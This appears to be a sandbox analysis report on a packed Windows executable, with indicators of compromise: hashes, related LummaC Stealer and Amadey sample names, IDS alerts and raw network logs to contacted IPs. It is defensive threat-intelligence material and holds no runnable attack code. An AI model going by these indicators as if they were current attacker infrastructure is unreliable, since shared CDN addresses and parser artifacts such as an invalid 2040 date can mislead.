                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          http://gift50steam.com/50Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          L0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.192.247.89
                                                                                                                                                                                                                          https://u.to/LZkkIgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.197.127.21
                                                                                                                                                                                                                          noypjksdaw.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          Q6EK7dte4N.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          jowinjoinery.icukmtsefjtjha.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          CheatInjector.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          L0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          13s1HMkHKv.exeGet hashmaliciousAmadey, DarkVision Rat, Fallen Miner, LummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          ModMenu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          noypjksdaw.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          x1D44JHWDf.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          dawothjkjad.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          dawothjkjad.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          legenassedk.topL0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          ModMenu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          noypjksdaw.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          x1D44JHWDf.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          dawothjkjad.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          dawothjkjad.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.1567.5483.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          download.php.exe.bin.exeGet hashmaliciousAmadey, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                          • 188.114.96.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                          nude.jpg.exe.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                          • 162.159.130.234
                                                                                                                                                                                                                          nbvtiopwadkkth.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          nngg.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                          • 172.67.19.24
                                                                                                                                                                                                                          awkthjjawdtrh.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          nude.jpg.exe.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                          • 162.159.136.234
                                                                                                                                                                                                                          Built.exe.bin.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                          NavaioSecurityTest (2).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.67.223.179
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9865895613266344
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: nvtoaldlrg.exe
File size: 1'311'232 bytes
MD5: 4a0c3d026246920f6b8bd466cc5fdd8c
SHA1: 2536873426bdcd8cdc5fa40b54d68cdf1a0766ff
SHA256: fdba4cab6bb651c5ffecf92d1bfd3de70ef5433a6aea4976db9753742799b7a3
SHA512: 45ee538f216f1c55ef32a39a3449e6198b265457c1e0a84843559e2d8ffd6aa8b0117335148bc493466e3081a7b81c71febba262e6297b0214f93b404fc82d04
SSDEEP: 24576:V+Fh6DotPSJFFV3jAos1aMYC8VhKbcFMaQkVHDr5fGBuBRxsP4:4FcDmSfjE1aM9Q4c2r8leBCRa
TLSH: 3B5533C90DE29A4FE9E3E1F99A98754F03A08D18F9CB6F7429439350E1949935FCB270
                                                                                                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....3.g.............................?............@..........................p<...........@................................. .....
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x423f1d
Entrypoint Section:
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67D033F4 [Tue Mar 11 13:00:36 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 71cc5af9daad65e58c6f29c42cdf9201
                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                          add esp, FFFFFFF0h
                                                                                                                                                                                                                          mov eax, 00401000h
                                                                                                                                                                                                                          call 00007FF85CBCC216h
                                                                                                                                                                                                                          call far 5DE5h : 8B10C483h
                                                                                                                                                                                                                          jmp 00007FF85CF6DD5Ch
                                                                                                                                                                                                                          jmp 00007FF85CBCC23Dh
                                                                                                                                                                                                                          xchg byte ptr [esi+61h], ah
                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                          sub ebx, ebx
                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                          mov dword ptr [ebp+ecx*4+5Fh], ecx
                                                                                                                                                                                                                          mov cl, 3Bh
                                                                                                                                                                                                                          out 4Eh, al
                                                                                                                                                                                                                          jmp far 01CDh : A434CB3Eh
                                                                                                                                                                                                                          movsb
                                                                                                                                                                                                                          insd
                                                                                                                                                                                                                          cmp esp, dword ptr [ebp+366B5C85h]
                                                                                                                                                                                                                          dec ebp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e2020 | 0x214 | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e2000 | 0xc | .data
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x4d000 | 0x29000 | d0ec224ed06267b02a7305f79734b4e3 | False | 0.9996248570884146 | data | 7.998779735129503 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x4e000 | 0x3000 | 0x1000 | dca4d7e75b2fda16279031255be5d4d0 | False | 0.99658203125 | data | 7.928958124958163 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x51000 | 0xe000 | 0x3200 | 24f1142fa2ada2d17221fdec81c4ccde | False | 0.99390625 | data | 7.974744623175405 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x5f000 | 0x4000 | 0x2200 | b1d1b0f2912520a0f950ef235666615e | False | 0.9977022058823529 | data | 7.970326652039579 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x63000 | 0x27f000 | 0x2ba00 | e966704a0cf80d9ceb6f0db90e584843 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x2e2000 | 0xe5000 | 0xe5000 | c16a435c5d84ed24cd67014128d6defc | False | 0.9959839400245634 | MacBinary, char. code 0x2e, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040, creator ' .', type ' !.', 3678510 bytes "." , at 0x3821ae 15736878 bytes resource dBase III DBT, version number 0, next free block index 3023220, 1st item "\251\266o8\250\373\250\021\347\363T\227\340G@\226\340\252\227\354\013g\243)\272\327\366RE\324w8\330\034" | 7.974703529943176 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
user32.dll | MessageBoxA
advapi32.dll | RegCloseKey
oleaut32.dll | SysFreeString
gdi32.dll | CreateFontA
shell32.dll | ShellExecuteA
version.dll | GetFileVersionInfoA
ole32.dll | CoCreateInstance
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49724 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49694 | 188.114.96.3 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49685 | 188.114.97.3 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49700 | 104.21.80.1 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49688 | 104.21.96.1 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49721 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49709 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49712 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49727 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49718 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49697 | 104.21.48.1 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49703 | 104.21.16.1 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49715 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:01.184550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49691 | 188.114.97.3 | 443 | TCP
2025-03-13T14:58:08.276345+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49682 | 188.114.97.3 | 443 | TCP
2025-03-13T14:58:10.966897+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49683 | 188.114.97.3 | 443 | TCP
2025-03-13T14:58:13.390678+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49684 | 188.114.97.3 | 443 | TCP
2025-03-13T14:58:21.057185+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49730 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:23.722136+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49731 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:26.347544+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49733 | 104.73.234.102 | 443 | TCP
2025-03-13T14:58:28.925365+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49738 | 188.114.96.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.325768948 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.330241919 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.330307007 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.330358982 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.330374002 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.336108923 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.336175919 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.336189032 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.382152081 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.413301945 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.460362911 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.488832951 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.488917112 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.488970995 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.489923954 CET49682443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.489937067 CET44349682188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.672449112 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.672514915 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.672607899 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.672888994 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:09.672904968 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:10.966808081 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:10.966897011 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.044123888 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.044169903 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.044466019 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.046480894 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.046669960 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.046694040 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.931147099 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.931274891 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.931324005 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.931416035 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:11.931437016 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:12.065493107 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:12.065550089 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:12.065622091 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:12.065944910 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:12.065958977 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:13.390568972 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:13.390677929 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:13.392016888 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:13.392028093 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:13.392280102 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:13.393591881 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:13.393703938 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:13.393733978 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:13.393781900 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:13.436347961 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:14.254348993 CET44349684188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:14.254770041 CET49684443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:14.460191965 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:14.460247993 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:14.460349083 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:14.460705042 CET49685443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:14.460719109 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.736433029 CET44349685188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.737662077 CET49686443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.737704039 CET44349686188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.737778902 CET49686443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.738357067 CET49686443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.738372087 CET44349686188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.739367008 CET44349686188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.739711046 CET49687443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.739758015 CET44349687188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.739809036 CET49687443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.740247965 CET49687443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.740278006 CET44349687188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:15.740323067 CET49687443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.546133995 CET49688443192.168.2.8104.21.96.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.546185017 CET44349688104.21.96.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.546307087 CET49688443192.168.2.8104.21.96.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.546788931 CET49688443192.168.2.8104.21.96.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.546798944 CET44349688104.21.96.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.547532082 CET44349688104.21.96.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.547920942 CET49689443192.168.2.8104.21.96.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.547986031 CET44349689104.21.96.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.548058987 CET49689443192.168.2.8104.21.96.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.548326969 CET49689443192.168.2.8104.21.96.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.548343897 CET44349689104.21.96.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.548722982 CET44349689104.21.96.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.549010992 CET49690443192.168.2.8104.21.96.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.549037933 CET44349690104.21.96.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.549108982 CET49690443192.168.2.8104.21.96.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.549431086 CET49690443192.168.2.8104.21.96.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.549460888 CET44349690104.21.96.1192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.549592972 CET49690443192.168.2.8104.21.96.1
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.571984053 CET49691443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.572005987 CET44349691188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.572104931 CET49691443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.572523117 CET49691443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.572534084 CET44349691188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.572952986 CET44349691188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.573304892 CET49692443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.573337078 CET44349692188.114.97.3192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.573513031 CET49692443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:16.573715925 CET49692443192.168.2.8188.114.97.3
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271428108 CET49714443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271462917 CET44349714104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271529913 CET49714443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271656990 CET49714443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271686077 CET44349714104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.271728992 CET49714443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.272727966 CET49715443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.272772074 CET44349715104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.272847891 CET49715443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.273212910 CET49715443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.273228884 CET44349715104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.273675919 CET44349715104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.273941994 CET49716443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.273956060 CET44349716104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274018049 CET49716443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274228096 CET49716443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274236917 CET44349716104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274606943 CET44349716104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274889946 CET49717443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.274930954 CET44349717104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.275176048 CET49717443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.275176048 CET49717443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.275257111 CET44349717104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.275316954 CET49717443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.438453913 CET49718443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.438509941 CET44349718104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.438611984 CET49718443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.439093113 CET49718443192.168.2.8104.73.234.102
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.439106941 CET44349718104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.439759970 CET44349718104.73.234.102192.168.2.8
                                                                                                                                                                                                                          Mar 13, 2025 14:58:17.440205097 CET49719443192.168.2.8104.73.234.102
